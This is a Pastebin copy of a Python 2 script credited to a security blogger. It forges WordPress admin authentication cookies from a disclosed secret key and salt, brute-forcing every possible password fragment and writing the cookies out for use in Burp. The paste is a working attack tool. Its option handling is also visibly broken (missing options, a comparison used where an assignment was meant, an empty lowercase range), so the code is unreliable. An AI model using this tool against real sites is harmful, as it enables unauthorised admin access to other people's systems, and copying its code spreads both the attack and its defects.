ToKeiChun

WordPress Auth Cookie Generator

Jan 23rd, 2021
780
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2. #
  3. ##############################################################################
  4. # Title:    WordPress Auth Cookie Generator Demo
  5. # Author:   Mike Czumak (T_v3rn1x) - @SecuritySift - securitysift.com
  6. # Purpose:  Generates WP auth cookies (requires valid Secret Key and Salt)
  7. # License:  You may modify and/or distribute freely, as long as it is not
  8. #           used maliciously or incorporated into any commercial product
  9. ##############################################################################
  10.  
  11. import hmac, hashlib, string, sys, getopt
  12.  
  13. # generate an md5 hash with salt in same manner as WP
  14. def wp_hash(data, key, salt):
  15.     wpsalt = key + salt
  16.     hash =  hmac.new(wpsalt, data, hashlib.md5).hexdigest()
  17.     return hash
  18.  
  19. # generate array of all 4 character password frags given a range of
  20. # upper and lower case letters numbers 0-9, slash (/) and period (.)
  21. def gen_pass_frag():
  22.  
  23.     lowerletters = list(map(chr, range(ord('a'), ord('Z')+1)))
  24.     upperletters = list(map(chr, range(ord('A'), ord('Z')+1)))
  25.     numbers = list(map(chr, range(ord('0'), ord('9')+1)))
  26.     specchars = ['/', '.'];
  27.     allchars = lowerletters + upperletters + numbers + specchars
  28.     frags = ''; # hold concatenated list of all 4-char frag combos
  29.     count = 0; # loop counter
  30.  
  31.     #generate all possible 4-character combinations for $pass_frag
  32.     for f1 in allchars:
  33.         for f2 in allchars:
  34.             for f3 in allchars:
  35.                 for f4 in allchars:
  36.                     frags += f1+f2+f3+f4+',';
  37.                     count += 1;
  38.                    
  39.     frags = frags.rstrip(',') # remove trailing comma
  40.     frag_array = frags.split(','); # split list into an array for iteration
  41.  
  42.     return frag_array
  43.  
  44. # generate all possible cookies for a given user
  45. def gen_cookies(username, expiration, pass_frag, key, salt, target):
  46.     frag_array = []
  47.     scheme = 'auth' # default auth scheme for wp
  48.    
  49.     # generate password frag combinations or use single frag passed as arg
  50.     if pass_frag == '':
  51.         frag_array = gen_pass_frag()
  52.     else:
  53.         frag_array = [pass_frag]
  54.    
  55.     cookie_id = 'wordpress_' + hashlib.md5(target).hexdigest() + '='
  56.     allcookies = '' # string to hold all generated cookies
  57.     i = 0 # loop counter
  58.    
  59.     # loop through each generated pass frag and build key/hash/cookie
  60.     for frag in frag_array:
  61.         hashkey = wp_hash(username + frag + '|' + expiration, key, salt)
  62.         hash = hmac.new(hashkey, username + '|' + expiration, hashlib.md5).hexdigest()
  63.         cookie = str(i) + ':' + frag + ':' + cookie_id + username + '%7C' + expiration + '%7C' + hash + '\n'
  64.         allcookies += cookie
  65.         i+=1
  66.  
  67.     print ('\n[+] Cookie gen complete. ' + str(i) + ' cookie(s) created.');
  68.    
  69.     if i == 1:
  70.         print '[+] Cookie: ' + allcookies.split(':')[2]
  71.     else:
  72.         # write cookies to file
  73.         filename = cookie_id.split('_')[1].split('=')[0] + '_' + username + '_cookies.txt'
  74.         f = open(filename, 'w')
  75.         f.write(allcookies)
  76.         f.close();
  77.         print ('[+] Cookies written to file [' + filename + ']\n')
  78.    
  79.  
  80. def main(argv):
  81.     username = 'admin' # default username
  82.     pass_frag = '' # default is to generate pass frags
  83.     expiration = '1577836800' # default expiration date (1/1/2020)
  84.     key = 'DisclosedKey'
  85.     salt = 'DisclosedSalt'
  86.     target = 'http://localhost/wordpress'
  87.    
  88.     print "\nWordPress Auth Cookie Generator"
  89.     print "Author: Mike Czumak (T_v3rn1x) - @SecuritySift - securitysift.com"
  90.     print "Purpose: Generates WP auth cookies (requires valid Secret Key and Salt)"
  91.  
  92.     usage = '''\nUsage: wpcookiegen.py\n\nOptions:
  93.     -u <username> (default is admin)
  94.     -f <pass_frag> (default/blank will generate all combos)
  95.     -e <expiration> (unix_date_stamp: default is 1/1/2020)
  96.     -k <key> (default is DisclosedKey)
  97.     -s <salt> (default is DisclosedSalt)
  98.     -t <target> (default is http://localhost/wordpress)\n\nNotes:
  99.     You can parse the cookie list directly in Burp with the following regex:
  100.     ^[0-9]*:[0-9a-zA-z\.\/]{4}:\n'''
  101.    
  102.     try:
  103.         opts, args = getopt.getopt(argv,'hu:f:e:s:')
  104.     except getopt.GetoptError:
  105.         print usage
  106.         sys.exit(2)
  107.        
  108.     for opt, arg in opts:
  109.         if opt == '-h':
  110.             print usage
  111.             sys.exit()
  112.         elif opt == '-u':
  113.             username = arg
  114.         elif opt == '-f':
  115.             pass_frag = arg
  116.         elif opt == '-e':
  117.             expiration = arg
  118.         elif opt =='-s':
  119.             salt = arg
  120.         elif opt == 'k':
  121.             key = arg
  122.         elif opt == 't':
  123.             target == arg
  124.  
  125.     gen_cookies(username,expiration,pass_frag, key, salt, target)
  126.  
  127. if __name__ == '__main__':
  128.     main(sys.argv[1:])
RAW Paste Data